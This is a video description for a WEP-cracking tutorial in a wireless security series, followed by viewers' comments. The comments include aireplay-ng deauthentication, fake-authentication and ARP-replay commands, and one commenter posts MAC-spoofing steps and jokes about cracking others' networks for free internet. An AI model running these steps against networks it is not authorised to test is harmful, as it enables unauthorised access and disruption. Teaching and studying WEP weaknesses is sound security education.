Description: Welcome to Part 15 of the WLAN Security Megaprimer! Please start this series by watching Part 1 http://www.securitytube.net/video/1756, if you have not done so already.
In this video, we finally reach the promised land - WEP Cracking :) We talk about the various cryptographic vulnerabilities plaguing WEP and then look at how to crack WEP either Passively or Actively. In Active cracking, we use the popular ARP Replay technique to stimulate the network to send more data packets. We then move on to understand that packets with Weak IVs contribute towards key cracking, and once we have a sufficient number of them, tools like Aircrack-NG can comfortably crack the WEP key.
Hope you enjoy this video! :)
Tags: 802.11 , WEP , Cracking , Aireplay-ng , ARP , replay , security , hacking , wireless , weak IV ,
First reply :$
i well watch this ,, now
thanks alot
you said part 14 lol :P ,, its 14 or 15 ?
Vivek, you are an incredibly gifted man and I sincerely thank you for your time and trouble in making this excellent series.
What screencast software are you using on that overpriced hunk of a rotten Apple you have? :-)
Have done lots of WEP cracking the " kiddie Script" way...now I understand more on "why" the procedures needed to be done.
Thanks again for the fantastic tutorial Vivek, please keep going! =)
hey vivek...........your videos are awesome, i already seen your all videos of metasploit, and i want to say that videos are really very good.
thanks
Great video Vivik, keep up with the good work. I hope after these wireless security videos, you could do a series of videos on network pen-testing.... And then offer advices on security and all the fun stuff.
awesome tnx Vivek
@ksa.hacker yes, that was a typo on the slide. Realized it later. Not in a mood to do video editing :) so left it at that.
@Blackmarketeer Thanks Buddy! I am using Quicktime on my Mac. It has an awesome screen capture option. For the picture-in=picture I use PIP which is free.
@Fitzroy Glad the video was useful :)
@Abaddon, vik_tester, behrouz Thanks Guys!
@infiltrator Yes, I will try to do those as well :)
mmm verry nice vivek very nice video / thankx a lot . i was wonder when you complete these courses can you make another courses about penetration with backtrack ???
Simply wonderful! This is exactly what I wanted. I assume this is what SpoonWEP does behind the scenes?
What keys are you hitting to clear the screen? I hate typing clear everytime
Just watched it now, i must it was great. Thanks again Vivek.
Thank You Vivek for your nice upload, Please we need multiple methods for cracking WPA and WPA2 with the latest methods and tools,
Thank You,
Thank you.Keep the good work.
Vivek I really consider you as my mentor,so can i ask you for a favor ?? yes I'll :D.
I'm just a nope in security field.I already have MCSE ,i have a good networking background -"as i think"- and i have a not bad Linux background.I want to enter the security field based on a solid background ,so could you recommend me an appropriate road-map to start "I don't mean certificates here" I mean what should i learn first "Like steps to security field".
Sorry for being annoying
thank you in advance.
Hey Vivek, are you planning on covering WPA/WPA2 cracking in this megaprimer? :)
These videos really are a cut above the rest. It's hard to explain complicated subjects to people and you do a fine job of it, Vivek. I'm glad that you're posting these for free. I know that helps out people just now learning this stuff & don't have a job yet.
I say that because you very easily could have charged for videos of this quality (says the guy that just spent a ton on CISSP videos).
Jaysin said "What keys are you hitting to clear the screen? I hate typing clear everytime"
Try Ctrl-L
great as every other video of the megaprimer.
go on go on :)
@Net-B0x I might. I am not really decided yet to be honest :)
@Jaysin I use Ctrl-L to clear the screen, its a nifty lil shortcut.
@m0ei, 3lL060 Thanks guys!
@Abaddon, @zidane Patience my friend :) Everything will come.
@elostaz3omda Your question requires a very detailed answer. I am planning to put together a tutorial on this subject as I receive a lot of emails on them. Stay Tuned!
@WCNA I don't think I will ever charge for the course material on ST. I believe all Education should be Free and be available for everyone - rich or poor, immaterial. This is my small contribution in that direction.
Thank you very much Vivek it's incredible......Honestly i'm thinking to travel to India just to meet you Face 2 Face LooooL.....congratulations i'm your biggest fan ever
think about it vivek i think it wil be a verry good idea
think about it vivek i think it wil be a verry good idea
Ah control-L. I should have known that. Haha thanks guys
Vivek said- "I believe all Education should be Free and be available for everyone".
I absolutely agree with you .........but if you say that in the US, they'll call you a communist :)
(Shhhh.....musn't let potential employers from knowing I believe in free higher education; even though it might save America from it's present decline).
Oops!
musn't let potential employers from knowing == (must keep potential employers from knowing || musn't let potential employers know)
Error 421: Data corrupted in transit from brain to keyboard. :)
Error 421 is much better than "Error 404 :brain Could not be found" ....just kiddin :P
Thanks again vivek!!!!! You have answered so many question in this video series and I really appreciate the time and effort!!! Like Net Box said a Pen-testing with backtrack mega primer will be excellent, I know you must be very busy with other projects for security tube but please consider the pen-testing series, i'm sure there are a lot of people interested in that!!!!
awesome video Vivek. Can't wait to learn how some of the more advanced attacks like chop-chop and your Cafe-latte attack works.
Mr Vivek Your Book " Wireless Pentesting With BackTrack " is free ?
-Vivek-
Let me start by simply saying Thankyou for taking the time to put these awesome tutorials together.
The past few months my interest in information security has been sparked! it is a field i believe i can excel.
My first subject of study since then has interestingly enough been Wireless Security! I learned alot threw just reading How-tos and tutorials left and right, Then i stumbled across this series. You've done a great job of explaining many specific topics in which i *was* unclear about.
You have inspired me to continue and i thank you again!
I also read above, this.
"I don't think I will ever charge for the course material on ST. I believe all Education should be Free and be available for everyone - rich or poor, immaterial. This is my small contribution in that direction."
This is the future! The internet is our gateway into making this The reality.
thank you again, and i look forward to your future contributions :)
peace!
You are Really Awesome Sir.........Please upload videos related to reverse engineering and SET(Social Engineering Tools) Kit backtrack ASAP.....delivering of content is very good.......I Hope we will see your more videos soon.. Thanks again for these videos. These videos are really helping me to learn lots of things and in my studies also..
Waiting for next one.....
"Waiting for next one....."
here you go: http://vimeo.com/23207363 before Vivek :p
@ahmadqdemat You are most welcome to come down :) I'd be happy to have a coffee / beer with you :)
Vishal, Net-B0x, Jaysin, esojzuir, Acebond, soheil.r, Machinist Thanks for all the compliments guys! More videos in this series and other new series, both to come! stay tuned :)
@m0ei You bet me to it by microseconds :) The next video is online now.
@nu11 I am happy you feel so! Security / Hacking is probably one of the most addictive things out there :)
@WCNA, Dr. Error Well, let them call me what they want :) Free Education for all! Free! Free! Free! :)
when I do airodump-ng --channel 1 mon0 I get
CH 1 ][ Elapsed: 6 mins ][ 2011-05-11 08:10 ][ fixed channel mon0: -1
It also says you are in channel -1 where as the ssid is in channel 1 at some later point too. What is it? and how to get "back" on the "track"? :)
I am using ubuntu 10.10 by the way thanks in advance.
never mind i found the solution. I followed this advice from one of the places in internet can't remember where. But it worked.
patching wireless driver
wget http://wireless.kernel.org/download/compat-wireless-2.6/compat-wireless-2010-10-16.tar.bz2
tar -jxf compat-wireless-2010-10-16.tar.bz2
cd compat-wireless-2010-10-16
wget http://patches.aircrack-ng.org/mac80211.compat08082009.wl_frag+ack_v1.patch
patch -p1 < mac80211.compat08082009.wl_frag+ack_v1.patch
wget http://patches.aircrack-ng.org/channel-negative-one-maxim.patch
patch ./net/wireless/chan.c channel-negative-one-maxim.patch
gedit scripts/update-initramfs
#*** FIND LINE 13: KLIB=/lib/modules/2.6.31-wl/build
#*** REPLACE WITH: KLIB=/lib/modules/$(uname -r)/build
make
sudo make install
sudo make unload
sudo reboot
Thank you very much for a great job...
vivek, you mentioned getting caught with active attacks, but why not use the good old fashioned
ifconfig mon0 down
ifconfig wlan0 down
macchanger --mac 13:37:13:37:13:37 wlan0
macchanger --mac 13:37:13:37:13:37 mon0
ifconfig wlan0 up
ifconfig mon0 up
;) This is what I would do if I had to crack WEP to watch your videos because I can't afford internet from these greedy ISPs...
Thanks Vivek for all the hard work in making these videos! It is greatly appreciated!
thanks professor R, another great video, WEP has been really fun so far!
I almost raised my hand to tell you about the fakeauth mistake, feels like I'm in a class room! Thanks, You are a great teacher.
Thanks for all these videos Vivek. I am more of a self taught / learning person so these videos 1 on 1 are just absolutely perfect. I am basically getting a University degree watching your mega primers I am episode 15 into this one and going through each video twice if not three times I my self have learned a ton. after this video I pen tested my own network with in 1 to 2 minutes I cracked both the 64 bit and 128 bit keys all completely randomly generated. it was very interesting to see how easy it is to crack wep encryption. but again I can't thank you any more.. keep doing what your doing.. now im back to class see ya in the many more videos ^-^
i am not able to get handshake any idea i already posted same que on u r twitter ,FB may be get ans In this question my client is already connected i am trying to deauth client but it seems it doesnt work . in arp request i m getting very low packets not more then 2 after long time any solution people
vivek. thanks for sharing. i can't tell you how much i appreciate this. your videos have sparked my interest in so many things. so many questions. i have been brushing up on my calculus to get a grip on the math involved in encryption.
Having an issue with this on BackTrack 5 R1 and v1.1 of aircrack-ng suite. The AP is rejecting my arp injection packets, even with -h specified using the associated clients MAC address. When I do a fakeauth it works, but never without.
Am I missing something obvious? Tips, thoughts?
Hello there,
First of all thank you so much for these precious videos !
I have a problem when i execute the
aireplay-ng --arpreplay -e target_essid mon0,
and it keeps showing to me:
mon0 is on channel -1, but the AP uses channel 1
Now, i have been searching for solution to this problem, in different forums, seen some suggestions and solution but none of them seems to work here. I also tried what a member named sakar mentioning above which is:
patching wireless driver
wget http://wireless.kernel.org/download/compat-wireless-2.6/compat-wireless-2010-10-16.tar.bz2
tar -jxf compat-wireless-2010-10-16.tar.bz2
cd compat-wireless-2010-10-16
wget http://patches.aircrack-ng.org/mac80211.compat08082009.wl_frag+ack_v1.patch
patch -p1 < mac80211.compat08082009.wl_frag+ack_v1.patch
wget http://patches.aircrack-ng.org/channel-negative-one-maxim.patch
patch ./net/wireless/chan.c channel-negative-one-maxim.patch
gedit scripts/update-initramfs
#*** FIND LINE 13: KLIB=/lib/modules/2.6.31-wl/build
#*** REPLACE WITH: KLIB=/lib/modules/$(uname -r)/build
make
sudo make install
sudo make unload
sudo reboot
but still, it doesn't work, i keep getting the same message: mon0 is on channel -1, but the AP uses channel 1
Please Mr Vivek i would really appreciate if you could give a little help !
Thank you in advance !
Excellent! it´s a shame that with DeAuth attack it´s so evident that your MAC is being re-used. I suppose that under penetration testing i should keep quiet and be patient.
this was a really fun video!!!
how can i download this video..
hi, friends
I know it will be lengthy question but i've lots of confusion so please plz.. plz... plz... try to solve my problem..
---> putting adapter in monitor mode
root@DELL:~# airmon-ng start wlan0
Found 4 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
PID Name
1171 NetworkManager
1439 wpa_supplicant
2668 dhclient3
2802 dhclient3
Process with PID 2668 (dhclient3) is running on interface wlan0
Interface Chipset Driver
wlan0 Unknown brcmsmac - [phy0]
(monitor mode enabled on mon0)
>> here although i'm getting this warning, my card is in monitor mode (according to iwconfig output)
mon0 IEEE 802.11bgn Mode:Monitor Tx-Power=19 dBm
Retry long limit:7 RTS thr:off Fragment thr:off
Power Management:on
wlan0 IEEE 802.11bgn ESSID:off/any
Mode:Managed Access Point: Not-Associated Tx-Power=19 dBm
Retry long limit:7 RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
>> here wlan0 is in "Managed" mode, but i think it will not be problem... mon0 is in monitor mode...
My victim API is one of my friend's laptop. running on channel 10
so, i started capturing packets on channel 10 (after setting my interface to channel 10), and in another shell i started fake-authentication attack
root@DELL:~# airodump-ng -c 10 mon0 --write captured
root@DELL:~# aireplay-ng --fakeauth 10 mon0 -e satish_wep
output of airodump-ng:
CH 10 ][ Elapsed: 1 min ][ 2012-10-28 22:15
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
BE:E4:9F:2B:FD:94 -1 0 1148 0 0 10 54 WEP WEP satish_wep
68:A3:C4:23:FD:94 -1 0 0 0 0 -1 -1 <length: 0=""> <--why this extra API is listed... (as a hidden API)
BSSID STATION PWR Rate Lost Packets Probes
BE:E4:9F:2B:FD:94 68:A3:C4:23:FD:94 -28 0 -12 0 725
BE:E4:9F:2B:FD:94 CC:AF:78:73:94:8A -30 0 -12 1131 656
68:A3:C4:23:FD:94 C0:CB:38:4B:3E:BC 0 0 - 1 0 43
BE:E4:9F:2B:FD:94 8C:A9:82:5E:3A:C6 -57 0 -12 37 527 satish_wep <--------- client connected
Q1---> here i've confusion. My friend's actual MAC is 68:A3:C4:23:FD:94, but airodump-ng shows API BSSID as BE:E4:9F:2B:FD:94 (its dynamically showing fake bssid, dont know why but whenever i startes new API from friend's laptop then its showing new bssid.......) so, how it will actually assigning fake bssid (from windows7)
API contains one client connected (another friend's laptop)
and why its showing actual mac as a connected client.
output of aireplay-ng --fakeauth:
root@DELL:~# aireplay-ng --fakeauth 10 mon0 -e satish_wep
No source MAC (-h) specified. Using the device MAC (C0:CB:38:4B:3E:BC)
22:14:22 Waiting for beacon frame (ESSID: satish_wep) on channel 10
Found BSSID "68:A3:C4:23:FD:94" to given ESSID "satish_wep".
22:14:22 Sending Authentication Request (Open System)
22:14:24 Sending Authentication Request (Open System)
22:14:26 Sending Authentication Request (Open System)
22:14:28 Sending Authentication Request (Open System)
--Attack was un-successfull.
Q2------> see here, bssid is 68:A3:C4:23:FD:94 (actual) but not getting authentication/de-authentication responce.. dont know why,
here if i use API BSSID (ie. BE:E4:9F:2B:FD:94) then i'm getting output:
root@DELL:~# aireplay-ng --fakeauth 10 mon0 -a BE:E4:9F:2B:FD:94
No source MAC (-h) specified. Using the device MAC (C0:CB:38:4B:3E:BC)
22:21:18 Waiting for beacon frame (BSSID: BE:E4:9F:2B:FD:94) on channel 10
2:21:28 No such BSSID available.
Please specify an ESSID (-e).
and is i specify -e option then it will take either BE:E4:9F:2B:FD:94 or 68:A3:C4:23:FD:94, if takes fake bssid then no responce from api and if takes actual bssid then No Such BSSID available (Beacon frames received in airodump-ng but here it is showing no responce... dont know why?? :(
.>>>
De-authentication attack also now working...
root@DELL:~# aireplay-ng --deauth 0 mon0 -a BE:E4:9F:2B:FD:94
22:28:51 Waiting for beacon frame (BSSID: BE:E4:9F:2B:FD:94) on channel 10
22:29:01 No such BSSID available.
Please specify an ESSID (-e).
and if i use ESSID diredctly then....
root@DELL:~# aireplay-ng --deauth 0 mon0 -e satish_wep
22:29:47 Waiting for beacon frame (ESSID: satish_wep) on channel 10
Found BSSID "8C:A9:82:5E:3A:C6" to given ESSID "satish_wep".
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac="">).
22:29:47 Sending DeAuth to broadcast -- BSSID: [8C:A9:82:5E:3A:C6]
22:29:48 Sending DeAuth to broadcast -- BSSID: [8C:A9:82:5E:3A:C6]
22:29:48 Sending DeAuth to broadcast -- BSSID: [8C:A9:82:5E:3A:C6]
22:29:48 Sending DeAuth to broadcast -- BSSID: [8C:A9:82:5E:3A:C6]
22:29:49 Sending DeAuth to broadcast -- BSSID: [8C:A9:82:5E:3A:C6]
22:29:49 Sending DeAuth to broadcast -- BSSID: [8C:A9:82:5E:3A:C6]
22:29:50 Sending DeAuth to broadcast -- BSSID: [8C:A9:82:5E:3A:C6]
22:29:50 Sending DeAuth to broadcast -- BSSID: [8C:A9:82:5E:3A:C6]
22:29:51 Sending DeAuth to broadcast -- BSSID: [8C:A9:82:5E:3A:C6]
22:29:51 Sending DeAuth to broadcast -- BSSID: [8C:A9:82:5E:3A:C6]
22:29:52 Sending DeAuth to broadcast -- BSSID: [8C:A9:82:5E:3A:C6]
22:29:52 Sending DeAuth to broadcast -- BSSID: [8C:A9:82:5E:3A:C6]
>>>but then also client remains connected...
i dont know why data packets are not received.... i tried using aireplay-ng --arpreplay but there also i'm not getting ARP request and ACK... both remains 0.. however Read packet increases.
i've googled a lot but still m not getting solution.. plz Vivek help me...
thanks for all of your video and your help....
i'm using BackTrack 5R3.. (64bit Gnome)
#uname -r
3.2.6
oops... i mean BT5 R2.. sorry
if no client is connected, how do i use --fakeauth if it doesn't generate any ARP packets?
Awesome video as usual, however do you have any good resources for exploring the cscope and ctag tools? I'm kind of new to both security and Linux in general (I figured that they were each useful for learning the other) and I had a hard time following along with getting the source code up. I am quite interested in this as I do have a programming background and would like to see how it works behind the scenes.
world's best free video's thanx vivek bhi ...